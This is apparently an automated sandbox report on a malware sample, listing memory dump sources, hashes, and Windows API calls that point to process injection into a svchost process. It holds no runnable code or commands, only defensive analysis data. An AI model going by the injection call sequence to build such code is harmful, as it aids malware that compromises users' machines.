          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$String$??3@Heap
          • String ID:
          • API String ID: 4235498366-0
          • Opcode ID: c12198bd40917f41d5f87fff9c6930f7040eddc6234b709b1659fba2cdf50f37
          • Instruction ID: f05e54370569ffaa4172b8e709ae349b72a04d2577a779893dc1ca082f76694d
          • Opcode Fuzzy Hash: c12198bd40917f41d5f87fff9c6930f7040eddc6234b709b1659fba2cdf50f37
          • Instruction Fuzzy Hash: 36110376204B8086EB56DF52E9903A9B3B4F788FC4F185116EF8A07B69CF39C891C741
          APIs
          • VirtualAllocEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 0000000140012116
            • Part of subcall function 0000000140013B50: WriteProcessMemory.KERNEL32 ref: 0000000140013BB8
          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 000000014001238C
            • Part of subcall function 0000000140013B00: ReadProcessMemory.KERNEL32 ref: 0000000140013B25
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: MemoryProcess$AllocFreeHeapReadVirtualWrite
          • String ID: @
          • API String ID: 3931978661-2766056989
          • Opcode ID: ccd70a0ca5a4c560fc92debafb302037228b4baa55aaef678cfa11071513d053
          • Instruction ID: 49d5038374c617281847cfa8613ef8dafcb7c1c33cb977380acacb8086e307ba
          • Opcode Fuzzy Hash: ccd70a0ca5a4c560fc92debafb302037228b4baa55aaef678cfa11071513d053
          • Instruction Fuzzy Hash: 97A12676205BC085EB629B27E4507EE67A0F788BC4F088425EF8D5BB69EF39C555CB00
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Heap$AddressProc$Free$AllocateFileLibraryLoadModuleNameProcessmemcpymemset
          • String ID:
          • API String ID: 140709066-0
          • Opcode ID: 2d1c915d3e61f1fb7c3c85f5494a43be86836c671b25dc83c622586cc8eb53fa
          • Instruction ID: efac56c58761c5b53cd2b935686c719a5323fa47eacfc037fad2ad30534b96ad
          • Opcode Fuzzy Hash: 2d1c915d3e61f1fb7c3c85f5494a43be86836c671b25dc83c622586cc8eb53fa
          • Instruction Fuzzy Hash: DD228FB5700B8585EB62DF22E8503EA23A0F789BD8F448166EB5D477B6DF38C909C744
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$memset
          • String ID:
          • API String ID: 631287834-0
          • Opcode ID: 5f052656b4539390a674b9cd562996d9c182f8e0918825306dd2bf5ae976865b
          • Instruction ID: 0399d008ca01f3e7ae8c4d26418939d543f2c779a5219281a3e46e336b9b5677
          • Opcode Fuzzy Hash: 5f052656b4539390a674b9cd562996d9c182f8e0918825306dd2bf5ae976865b
          • Instruction Fuzzy Hash: 53E1C0B660468281EB62DB23F4407EB67A1F798BC8F544026FF8947BA9DB39C941C740
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeMemoryProcessVirtualWrite
          • String ID: @
          • API String ID: 2227173347-2766056989
          • Opcode ID: 9a413e4547a8f19bf2b71c811f9e043220cfa0b658f72ae18e561b0f4f9a5e0c
          • Instruction ID: 55d91dff6a088f6984b8b652fa138d81b5292368ccde077922b963bfd0e4f872
          • Opcode Fuzzy Hash: 9a413e4547a8f19bf2b71c811f9e043220cfa0b658f72ae18e561b0f4f9a5e0c
          • Instruction Fuzzy Hash: 47113536308B9081EB618B07A85479AA7A4F78CFD0F488025EF8C87B69EF39C145CB00
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ef001dc6a8a34588974efeeab15473d05159a0728a0990e54c085eaf818c73d9
          • Instruction ID: abf0167f26eaa8b1341e4727f4fb40882108a042724cd5bbc7dba3d4017e7680
          • Opcode Fuzzy Hash: ef001dc6a8a34588974efeeab15473d05159a0728a0990e54c085eaf818c73d9
          • Instruction Fuzzy Hash: 47A16EB6215A8085EB62CF27E8447EE67A1F788BC8F14402AEF4D477A9EF39C545C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap
          • String ID:
          • API String ID: 3298025750-0
          • Opcode ID: b108f9f4a893c3e12e67817eb476791b24ba81c44ca3d0697336e7036c249844
          • Instruction ID: f58b36fc4f80b02d6db5818868401dd8c31dbbb25ea06bc06c998337cc310218
          • Opcode Fuzzy Hash: b108f9f4a893c3e12e67817eb476791b24ba81c44ca3d0697336e7036c249844
          • Instruction Fuzzy Hash: B951C3B5701B8281EB63CB13B4147EB22A5FB89BC8F188024FF4D57BA6DE39C9059744
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeapmemcpy
          • String ID:
          • API String ID: 673829100-0
          • Opcode ID: 72da0d61fca60a9855a74ed57a38a50fbf2db88a5ba32426b899817a34a2c748
          • Instruction ID: c92d060d941fca04b38797fdd340357e26ec207b449130a56d7bb1cc0a947dbe
          • Opcode Fuzzy Hash: 72da0d61fca60a9855a74ed57a38a50fbf2db88a5ba32426b899817a34a2c748
          • Instruction Fuzzy Hash: 73418E35600B8181EB129B2398503EA62A1FB8CBD8F94C119EF5E5B7B5DF3ACD85C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$memcpy
          • String ID:
          • API String ID: 1887603139-0
          • Opcode ID: e115f566d86e52d7b676b8586eccf910824452cc7cf57d3d669636780f8eff8e
          • Instruction ID: b21d00c09a7a7cebf341c700073de6dca50953cd70a54a6fcbc8b966eb336d55
          • Opcode Fuzzy Hash: e115f566d86e52d7b676b8586eccf910824452cc7cf57d3d669636780f8eff8e
          • Instruction Fuzzy Hash: D7416C76204B8586EB66CF27E8007DA77A4F788BD4F488016AF4C477A9DF38C945CB40

          Execution Graph

          Execution Coverage:27.6%
          Dynamic/Decrypted Code Coverage:100%
          Signature Coverage:0%
          Total number of Nodes:21
          Total number of Limit Nodes:1
          execution_graph 428 6c007e 429 6c0083 428->429 441 6c05bd VirtualAlloc 429->441 431 6c0093 432 6c00a4 VirtualProtect VirtualProtect 431->432 436 6c00dc 432->436 433 6c012c 442 6c01c0 433->442 434 6c00f3 VirtualProtect 434->436 437 6c0122 VirtualProtect 434->437 436->433 436->434 436->437 437->436 438 6c0136 439 6c0187 VirtualFree 438->439 440 6c018f 439->440 441->431 443 6c0243 442->443 446 6c01d0 442->446 443->438 444 6c01f5 VirtualProtect 444->446 445 6c0232 VirtualProtect 445->446 446->443 446->444 446->445 447 6b0000 449 6b000a 447->449 448 6b0030 449->448 450 6b0054 VirtualAlloc 449->450

          Callgraph

          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 10002058
          • NtAllocateVirtualMemory.NTDLL ref: 100020C2
          • NtAllocateVirtualMemory.NTDLL ref: 10002144
          • NtWriteVirtualMemory.NTDLL ref: 100021AC
          • NtProtectVirtualMemory.NTDLL ref: 10002219
          • NtAllocateVirtualMemory.NTDLL ref: 100022BF
          • NtAllocateVirtualMemory.NTDLL ref: 10002307
          • NtFreeVirtualMemory.NTDLL ref: 1000236D
          Strings
          Memory Dump Source
          • Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryVirtual$Allocate$FreeProtectWrite
          • String ID: 0$@
          • API String ID: 2341880195-1545510068
          • Opcode ID: f87315e85e7ea5ee04e93949c62e377effce1a32d370792e8fe14f822cac0e62
          • Instruction ID: 8a67cd01151eb9b4bc0707442a35890dfe94f4f8c30553d2cc09ea552f4a7a1d
          • Opcode Fuzzy Hash: f87315e85e7ea5ee04e93949c62e377effce1a32d370792e8fe14f822cac0e62
          • Instruction Fuzzy Hash: 1052B976210B9186EB21CF26E89478E37A5FB48BD8F414216EE8D87B5CDF38C695C740
          APIs
          Memory Dump Source
          • Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: CloseCreateDuplicateEventFreeMemoryObjectVirtual
          • String ID:
          • API String ID: 2195376797-0
          • Opcode ID: 125e384b1580ac73084a014f6f5d19768dab637254859a7a07da6fbda5995ce6
          • Instruction ID: ec56d51781d27893633d9c7240a3277deb896bb74b027171511855976fde94cd
          • Opcode Fuzzy Hash: 125e384b1580ac73084a014f6f5d19768dab637254859a7a07da6fbda5995ce6
          • Instruction Fuzzy Hash: 5BA14476314B5086E721CF65E89078E33B5FB48BD9F404216EE8D87A58EF79D0A9C780
          APIs
          • NtReadVirtualMemory.NTDLL ref: 10003264
          • NtAllocateVirtualMemory.NTDLL ref: 100032C6
          Strings
          Memory Dump Source
          • Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryVirtual$AllocateRead
          • String ID: @$H
          • API String ID: 3289415595-104103126
          • Opcode ID: 45b0df9b2760fa00ff26ba3f8ced848685c82d721b20d44215791ef4f5557619
          • Instruction ID: dea1a02c564d3dd13500935e78af13ab2823ce8030b56d528f9cdc6a1a59fef7
          • Opcode Fuzzy Hash: 45b0df9b2760fa00ff26ba3f8ced848685c82d721b20d44215791ef4f5557619
          • Instruction Fuzzy Hash: E3515672701B818AEB61CF65E480B8E73B9FB48BD8F508116EE9D57A58DF38C15AC740
          APIs
          • NtReadVirtualMemory.NTDLL ref: 100034A2
          • NtWriteVirtualMemory.NTDLL ref: 10003534
          • NtClearEvent.NTDLL ref: 10003554
          • NtSignalAndWaitForSingleObject.NTDLL ref: 10003568
          • NtReadVirtualMemory.NTDLL ref: 1000359A
          Strings
          Memory Dump Source
          • Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryVirtual$Read$ClearEventObjectSignalSingleWaitWrite
          • String ID: H$H$H
          • API String ID: 295313806-1989617792
          • Opcode ID: 3ca87656067ffe8b229c32908ea08fee09abe8ed5b1d66e628708bdb819a434f
          • Instruction ID: 5021ed8a1ce9b19b5c1717e875882b8ce5ca7f80513f570afed245be05e02f97
          • Opcode Fuzzy Hash: 3ca87656067ffe8b229c32908ea08fee09abe8ed5b1d66e628708bdb819a434f
          • Instruction Fuzzy Hash: 3E310A76315B8196EB628F25E94078A73A4F7887D5F405125DF8D83B18EF39C5A9CB00
          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 10002FCF
          • NtAllocateVirtualMemory.NTDLL ref: 1000304E
          • NtReadVirtualMemory.NTDLL ref: 1000319D
          • NtFreeVirtualMemory.NTDLL ref: 100031ED
          Strings
          Memory Dump Source
          • Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryVirtual$Allocate$FreeRead
          • String ID: @
          • API String ID: 1625299726-2766056989
          • Opcode ID: 0f366e26a0798a30fde1c151075a89e6975462614e01b7bf4b65f50e877308c2
          • Instruction ID: 08cac392a7a719ba5502d424389b33665d87b9a1454d0d325e88c27c51f30f16
          • Opcode Fuzzy Hash: 0f366e26a0798a30fde1c151075a89e6975462614e01b7bf4b65f50e877308c2
          • Instruction Fuzzy Hash: 1E713776705A809AE712CF61E8507DE77B9F748BCCF008426EE8A97A18DF39C159C740
          APIs
          • MultiByteToWideChar.KERNEL32 ref: 10002CF3
          • NtAllocateVirtualMemory.NTDLL ref: 10002D8F
          Strings
          Memory Dump Source
          • Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: AllocateByteCharMemoryMultiVirtualWide
          • String ID: @
          • API String ID: 2538853753-2766056989
          • Opcode ID: 6db13f651ae0562452465d8fcef45ca460b0c7a57652c6155d982de570f98954
          • Instruction ID: 616015141f86b4411b04d895360121dff96872f804a9fadd55d9b66df03b3043
          • Opcode Fuzzy Hash: 6db13f651ae0562452465d8fcef45ca460b0c7a57652c6155d982de570f98954
          • Instruction Fuzzy Hash: 1E610776204B8186E721DF21E89039E77B8F7887D8F504126EE8D87A2CDF79C599CB00
          APIs
          • NtQueryInformationProcess.NTDLL ref: 1000160F
          • NtReadVirtualMemory.NTDLL ref: 10001644
          • NtReadVirtualMemory.NTDLL ref: 100016AB
          • NtReadVirtualMemory.NTDLL ref: 100016F1
          Strings
          Memory Dump Source
          • Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryReadVirtual$InformationProcessQuery
          • String ID: @
          • API String ID: 2292840443-2766056989
          • Opcode ID: 1586ad8fb1f5eced5170f8237ecfd31ce70e54e35ace2cb357b905d546dd4cf7
          • Instruction ID: 13bcebea3263881b6e9f5070fea06d859024c12457ffc486f15f1268fdda5df8
          • Opcode Fuzzy Hash: 1586ad8fb1f5eced5170f8237ecfd31ce70e54e35ace2cb357b905d546dd4cf7
          • Instruction Fuzzy Hash: 9B31D7B2618BD191E7B19B15F8447CEB368F788BC9F854125DB8943A48DF3DC186CB04

          Control-flow Graph

          APIs
            • Part of subcall function 006C05BD: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,006C0093), ref: 006C05CA
          • VirtualProtect.KERNELBASE(?,?,00000004,?,?), ref: 006C00B3
          • VirtualProtect.KERNELBASE(?,?,00000002,?,?,?,00000004,?,?), ref: 006C00C3
          • VirtualProtect.KERNELBASE(?,?,00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004), ref: 006C010C
          • VirtualProtect.KERNELBASE(00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004,?,?), ref: 006C0122
          • VirtualFree.KERNELBASE(?,00004000,00000002,?,?,?,00000004,?,?), ref: 006C0187
          Memory Dump Source
          • Source File: 00000007.00000002.2462716197.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6c0000_44qxnhoiecq.jbxd
          Similarity
          • API ID: Virtual$Protect$AllocFree
          • String ID:
          • API String ID: 3729553426-0
          • Opcode ID: 7cb60aa3ca57c834e55298138eb6fcc60219c6ce3e155163db882c0b84b65934
          • Instruction ID: 75d7c6bc5f97679bdffee2139a64472b8f009ced8ff5ad679ec0e1cd10ae7a69
          • Opcode Fuzzy Hash: 7cb60aa3ca57c834e55298138eb6fcc60219c6ce3e155163db882c0b84b65934
          • Instruction Fuzzy Hash: 20419D72200114EFEB54AF64C885FBAB7AAEF88724B25451DF9059B712C771EC02CAA4
          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 10001958
          • NtWriteVirtualMemory.NTDLL ref: 100019AF
          • NtFreeVirtualMemory.NTDLL ref: 100019F2
          Memory Dump Source
          • Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryVirtual$AllocateFreeWrite
          • String ID:
          • API String ID: 2213553877-0
          • Opcode ID: 99ed4c72808152846b4c4dc95cb12d5b80bf151d319c17aa8236581e06b6da23
          • Instruction ID: 4be20192d114f57ed866d6a02c79e9e60545017e345fbc303b6d3b3f1d5ba602
          • Opcode Fuzzy Hash: 99ed4c72808152846b4c4dc95cb12d5b80bf151d319c17aa8236581e06b6da23
          • Instruction Fuzzy Hash: 3A213872705B8082EB11CF65E85478A77A8F789BD5F584029DF8C87B68DF39C58ACB40
          Memory Dump Source
          • Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d10ebd9e48d5dcbf352534e80ccc9bc8cebbc059bbcb083b2fa9c46e13604436
          • Instruction ID: bc3fb0688c431488aa2819edea9e73b974ef83373d57799a2a78b4a70b7274a1
          • Opcode Fuzzy Hash: d10ebd9e48d5dcbf352534e80ccc9bc8cebbc059bbcb083b2fa9c46e13604436
          • Instruction Fuzzy Hash: D5117026304F8182EB11DB24E89139E23A0FB997D4F100024FE8D8736DEF6CC999C750
          APIs
          • NtWriteVirtualMemory.NTDLL ref: 100017EE
          Memory Dump Source
          • Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryVirtualWrite
          • String ID:
          • API String ID: 3527976591-0
          • Opcode ID: d850f230c99a5425dd30eee36a9840c513874e73cb9285ce0d5e71e6250e9977
          • Instruction ID: 85a4ee6809ba2549589f64f9e1a2927fba021b9ffec7882c337938f7ba2d8dd0
          • Opcode Fuzzy Hash: d850f230c99a5425dd30eee36a9840c513874e73cb9285ce0d5e71e6250e9977
          • Instruction Fuzzy Hash: 7BE03072714B8086D7408F1AF58064AB3A8F7887C4F848135FB9D83B18EF78C5A5CB04
          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 10001858
          Memory Dump Source
          • Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: AllocateMemoryVirtual
          • String ID:
          • API String ID: 2167126740-0
          • Opcode ID: dceb824580b96e71b405478d58ecacf46d89fa57c2bddcfa4af7ef3f192c92e1
          • Instruction ID: 4d70551202633f4cf27d5d93aec4b253003e6b1c8e1263e06443463bb6e67a25
          • Opcode Fuzzy Hash: dceb824580b96e71b405478d58ecacf46d89fa57c2bddcfa4af7ef3f192c92e1
          • Instruction Fuzzy Hash: 31E0C976A18780C6D710DF28E48074ABBB4F79A798FA04015EB8C82A28DB7DC155CF00
          APIs
          • NtProtectVirtualMemory.NTDLL ref: 100018EA
          Memory Dump Source
          • Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryProtectVirtual
          • String ID:
          • API String ID: 2706961497-0
          • Opcode ID: eda178d3c121a3c0246aa1a68712fd338b248a141ea66084485477232ac8b8b6
